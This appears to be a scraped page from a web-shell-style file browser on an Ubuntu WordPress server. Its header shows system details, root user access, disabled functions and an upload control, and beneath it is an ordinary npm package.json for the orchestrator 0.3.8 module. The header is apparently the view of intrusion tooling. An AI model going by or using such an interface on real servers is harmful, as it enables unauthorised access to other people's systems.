HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/zaklada/html/node_modules/orchestrator/package.json
{
  "_args": [
    [
      "orchestrator@0.3.8",
      "C:\\wamp\\www\\tokic-shop\\html"
    ]
  ],
  "_development": true,
  "_from": "orchestrator@0.3.8",
  "_id": "orchestrator@0.3.8",
  "_inBundle": false,
  "_integrity": "sha1-FOfp4nZPcxX7rBhOUGx6pt+UrX4=",
  "_location": "/orchestrator",
  "_phantomChildren": {},
  "_requested": {
    "type": "version",
    "registry": true,
    "raw": "orchestrator@0.3.8",
    "name": "orchestrator",
    "escapedName": "orchestrator",
    "rawSpec": "0.3.8",
    "saveSpec": null,
    "fetchSpec": "0.3.8"
  },
  "_requiredBy": [
    "#DEV:/",
    "/gulp"
  ],
  "_resolved": "https://registry.npmjs.org/orchestrator/-/orchestrator-0.3.8.tgz",
  "_spec": "0.3.8",
  "_where": "C:\\wamp\\www\\tokic-shop\\html",
  "author": {
    "name": "Rob Richardson",
    "url": "http://robrich.org/"
  },
  "bugs": {
    "url": "https://github.com/robrich/orchestrator/issues"
  },
  "dependencies": {
    "end-of-stream": "~0.1.5",
    "sequencify": "~0.0.7",
    "stream-consume": "~0.1.0"
  },
  "description": "A module for sequencing and executing tasks and dependencies in maximum concurrency",
  "devDependencies": {
    "event-stream": "~3.3.4",
    "gulp-uglify": "^2.0.0",
    "jshint": "^2.9.4",
    "map-stream": "~0.0.6",
    "merge-stream": "~1.0.0",
    "mocha": "~3.1.2",
    "q": "~1.4.1",
    "should": "~11.1.1",
    "vinyl-fs": "~2.4.4"
  },
  "homepage": "https://github.com/robrich/orchestrator",
  "keywords": [
    "async",
    "task",
    "parallel",
    "compose"
  ],
  "license": "MIT",
  "main": "./index.js",
  "name": "orchestrator",
  "repository": {
    "type": "git",
    "url": "git://github.com/robrich/orchestrator.git"
  },
  "scripts": {
    "test": "mocha"
  },
  "version": "0.3.8"
}